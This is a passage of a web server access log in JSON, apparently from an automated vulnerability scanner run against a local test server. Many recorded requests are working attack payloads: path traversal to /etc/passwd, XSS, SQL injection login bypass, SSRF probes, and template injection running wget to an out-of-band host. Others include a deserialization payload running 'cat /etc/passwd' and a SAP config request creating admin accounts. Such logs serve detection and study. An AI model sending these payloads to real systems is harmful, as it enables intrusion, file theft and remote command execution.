+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://c9v8h8gsmpv8c1qg07h0b8ydrza3f7y7p.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c9v8h8gsmpv8c1qg07h0k8h7qdze6iwm1.oast.fun%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://c9v8h8gsmpv8c1qg07h0zn55z8mw1qwrd.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 